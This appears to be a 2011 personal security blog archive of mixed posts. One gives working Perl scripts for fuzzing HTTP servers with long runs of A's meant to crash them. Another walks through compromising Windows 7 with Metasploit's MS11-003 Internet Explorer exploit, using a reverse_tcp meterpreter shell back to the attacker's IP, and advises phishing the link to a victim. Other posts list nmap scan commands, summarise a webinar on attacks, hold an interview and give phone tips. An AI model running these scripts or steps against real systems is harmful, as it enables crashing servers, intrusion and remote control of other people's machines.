Thursday, 29 December 2011

HTTP Fuzzing - Perl

Here is the Protocol Fuzzing Script, Which will get some awesome crashes/bugs on HTTP Server.

This Script works as a basic version but, reliable. The overflow.txt is upto the user.

Code Snippet

#!/usr/bin/perl
# HTTP Protocol Fuzzing (Basic)
# Find most of the bugs in Modems, Routers, minihttp servers, etc....
#
# Usage: perl httpfuzz.pl <IP> <Port>
# Example: root@n41k#perl httpfuzz.pl 192.168.1.1 80
#          root@n41k#perl httpfuzz.pl 172.16.1.1 8080
#
# Author : Srinivas Naik (0xN41K)
#
use IO::Socket;
$target = $ARGV[0];
$port = $ARGV[1];


print "\n\nHTTP Protocol Fuzzing..\n";
$sock = IO::Socket::INET->new(
        Proto=>"tcp",
        PeerPort=>$port,
        PeerAddr=>"$target"
)or die "\nCan't connect to $target..\n";


open(http2,"http_methods.txt"); #Contains HTTP Methods like GET, OPTIONS, etc..
@http_method=<http2>;
foreach $method (@http_method){


        open(http1,"overflow.txt"); #Collection of incremental A's
        @http=<http1>;
        chomp($method);
        foreach $line (@http){
                chomp($line);
                $request = "$method $line/main.html"." HTTP/1.0\r\n\r\n";
                print $sock $request; #Send the HTTP DATA to the Network
                sleep 2;
                print $request."\n";
                }
        close(http1);
        }
close $sock;
close(http2);
print "Done...\n";
     
Above Fuzzer needs two file inputs 
1. http_methods.txt containing GET, PUT, HEAD, OPTIONS etc... each in NEW LINE
2. overflow.txt containing incremental A's can be generated from B0F.pl

#!/usr/bin/perl
# Usage: root@n41k#perl B0F.pl 10000
$len = $ARGV[0];
my $PoC = "A";
open(file , ">>", "overflow.txt");
for ($i=1;$i<$len;$i++){
            print file $PoC x $i;
            print file "\n";
      }
print "\n [+] File successfully created!\n" or die print "\n [-] OVERFLOW Not Created !! ";
close(file);

Posted by at 18:45 0 comments

Monday, 12 December 2011

My Best Experiences with NMAP

 Command 1: nmap -sS -A -O -sS -sU <Target IP>
               PORT STATE SERVICE VERSION
                    21/tcp open ftp vsftpd 2.0.4
                    |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
           Aggressive OS guesses
               Network Distance
               Host script results
               Tracroute
      **Above command consumes little more time :) 

 Command 2: nmap -sS <Target IP> -p21,23,80,139,445 --reason
       reason --> specifies decision on port state

 Command 3: nmap -p445 --script=smb-os-discovery <Target IP>

 Command 4: nmap --osscan-limit -n -vvv -PN --scan-delay 1s -A

Will discuss more in coming post's....
Posted by at 11:37 0 comments

Thursday, 8 December 2011

Webinar: Advance Persistant Defence

Webinar: Advance Persistant Defence
By: Marcus Carey, RAPID7
Time: 00:30Am - 01:30 Am Thu 08, Dec 2011

In the webinar he was specifically focussing on the overall attacks how APT is spreading.

I am briefing them in this post:

1. Most Attacks require Human Interaction
- Click BAD links / Files
- USB Media
From above there are 29.80% Technical Attacks
70.80% is done by Social Engineering i.e. Attacking mind of user.

Special Note was made that Mass Malware Packs are Publically available and out of which 99%+ of attacks dont involve 0day.

2. Perimeter Exploit Exposure
- MS11-083
Attackers could send UDP data through closed ports
- Network Egress Points
No filtering TCP/UDP
Maintaining Firewall Rules
Legacy rules in place

3. Web Application Long Tail
- Problem
Many 2011 breaches used SQL Injection

- Mitigation
Intense Code Review when Changes are made
Reqular assessment for deployed code

4. Social Engineering
- People open Malicious links/Execuatables
- Can lead to complete compromise of system
- Phishing is the leading cause of compromise (70.8%)
Posted by at 21:24 0 comments

Dead Evil Captures - Xploits PCAP

I have put all the Exploits, it also contains latest attacks in it.

Created it for testing IDPS / Intrusion System.

http://groups.google.com/group/nforceit/browse_thread/thread/5ca43f14cf0ffd4a

Just download the PCAP from the link

File: exploit_attack.pcap
Posted by at 00:50 1 comments

Thursday, 24 November 2011

Interview with Mr.C.S. Lee

Interview with Mr.C.S. Lee (Core Member – HeX LiveCD).

Naik: Can you tell us about yourself Mr.Lee
Lee: I'm human from earth, not alien. Maybe I'm alien in the eyes of other aliens in other planets but that don't count.
Most people know me as geek00l but I'm C.S.Lee. Compare to the rest of the guys, I'm kinda late into security field,
or to be exact computing. I have chance to play around with computer stuffs when I was 21 years old because of working
in cyber cafe. I'm lucky enough to stop my study in local University and focus on computing. I'm a self learner and pick
up most of the stuffs from internet, back then I use a lot of astalavista, yahoo and some other search engines to look
for information and study.

Naik: Can you share us with your views in Security and Forensics
Lee: My view in computer security is simple enough. Why do we need security(not only we need security in computing but general)?
Because we human being is flawed, you can't expect the imperfect human being to create perfect thing, and hence introduces
weakness in any creation.

Lee: Forensics on the other hand is more like the aftermath study, you perform analysis based on what is available at particular
time. You focus a lot on post-processing and report what you find. One thing I find interesting is people like logic and
tend to think they are right, in forensics you can't apply your own logic to the subject you are analyzing, you should follow
your subject's logic in order to find out the real motives behind every single action.

Naik: Have you ever been a victim to Cyber Attack
Lee: Victim of cyber attack? Indirectly yes. I load malware to my sandbox and I'm infected ;) If you want me to give you exact
answer, I can't really tell. Back then when I used Windows I might not even know if I'm victim. If you are talking about
serious victim, I haven't been one yet.

Naik: Could you briefly let us know about your projects
Lee: I do various IT-Security projects - some commercial and some open source. I involve in HeX system, NSM-Console, Picviz,
Splunk plugin and some other projects. All of them are interesting to me. Most of the projects are security related but can
be applied for other domain, for example picviz allows you to visualize not only IT security data but financial data as well.

Naik: Can you share us with yor most accomplising work
Lee: No idea regarding my most accomplished work, I involve in some other projects I'm really proud of but NDA not allows me to
share about them. Anyway I'm happy doing open source stuffs


Naik: Your secret behind actively replying to posts in various groups
Lee: No secret ;) subscribe and follow mailing list, group them properly in your email so that you can keep them in order. On the other
hand, keep good list of rss feeds for IT security sites. IT security is never sleep industry and you need to always keeping track
of the threat landscape.

Naik: Any suggestion/ideas you would let to know for newbies
Lee: For whoever want to enter IT security industry, unfortunately there's no shortcut. The most important thing you need to have is
not knowledge but passion, with passion you will keep going on no matter how tough it is ;)

Naik: Do's and Dont's for a succesful carrier in Security & Forensics
Lee: Do & Don't, Don't ask silly question before you do your part(study and research on certain subject). This industry is not for
lazy people, apparently.

Naik: Finally, what makes you feel attention in Cyber World
Lee: The attention, this is interesting question indeed. I guess it is the threat landscape, it keeps changing and evolving from time
to time with countermeasures applied and I need to watch them ;)

Naik: Is there anything else you would like to tell us.
Lee: All for now, thank you!

More about Mr. Lee:
http://groups.google.com/group/HeX-liveCD
http://www.securitydistro.com/security-articles/Interview-with-C.S.-Lee-creator-of-HeX
Posted by at 02:00 0 comments

Tuesday, 22 November 2011

How did I hack into Windows7 Ultimate (x86)

Initially I started scanning using Nmap. But end up with basic Windows ports open 135, 139 and 445.

Then Started to gear up with smb exploits available in MSF, but failed. Finally Internet Explorer Bug made Windows7 machine to OWN.

I owned a LAN machine with this bug and maintained access.

Exploit Details:
Windows 7 for 32-bit Systems with Internet Explorer 8 Remote Code Execution Severity:Critical
Reference: http://technet.microsoft.com/en-us/security/bulletin/ms11-003

How to Exploit:
1. Launch Metasploit
2. Update it
3. Type msfconsole
4. Search for ms11_003_ie_css_import
5. Use the exploit by choosing reverse TCP as Payload.

msf > use exploit/windows/browser/ms11_003_ie_css_import
msf exploit(ms11_003_ie_css_import) > show payloads
msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms11_003_ie_css_import) > set LHOST [MY IP ADDRESS]
msf exploit(ms11_003_ie_css_import) > exploit


6. Share or Phish the Created URL with the Victim
7. Once the Victim opens the URL on IE8, you will get Notified
8. Check sessions -l for Succesful Session.
9. Now, use the session by >> session -i 1
10. Then type shell to see the Windows Prompt.


Cheers !!!!! Now you also OWN an Windows7 Machine

*** My setup includes BackTrack5 (Running Metasploit) and Target as Windows 7 Ultimate Edition, with IE8 Browser.
Posted by at 20:37 0 comments

Monday, 21 November 2011

Unlocking Mobile Phones


Unlock your Mobile Phone 
  1. *#06#                               Show the IMEI number
    2. 

  2. **03*OldCode*NewCode*NewCode#       Change code for call barring
    3. 

  3. **03*330*OldCode*NewCode*NewCode#   Change code for call barring
    4. 

  4. **04*OldPIN*NewPIN*NewPIN#          Change PIN code
    5. 

  5. **042*OldPIN2*NewPIN2*NewPIN2#      Change PIN2 code
    6. 

  6. **05*PUK*NewPIN*NewPIN#             Unlock PIN code
    7. 

  7. **052*PUK2*NewPIN2*NewPIN2#         Unlock PIN2 code
    8.
Posted by at 20:18 0 comments
Location: India

Wednesday, 16 November 2011

Fake Call -- Awesome Trick



All you have to have to do first is get this fake call and set a voice or you can also use this feature without the voice depends according to your wish or requirement.

Go to Menu --> Setting --> Application Settings --> Fake call --> Fake call voice (or) No voice--> record a voice or something accordingly to your wish.

After this step bring your fake call application to your shortcut
Go to Menu --> Setting --> Phone Settings --> Shortcuts Select Up (or) Down --> Options --> Change --> fake call --> Save --> Back to Home Screen

Now Press Up (or) Down key as save in the above step you will get an alert "Activate Fake Call"
After Activation with in 7 seconds you will get a call Answer the call and leave from your desired location.

Once you get used to this usage everything will be okey for you to use it.

Enjoy fake calling feature of best stylish SAMSUNG CORBY TXT.!!! I practically used this feature.
Posted by at 21:14 0 comments
Subscribe to: Comments (Atom)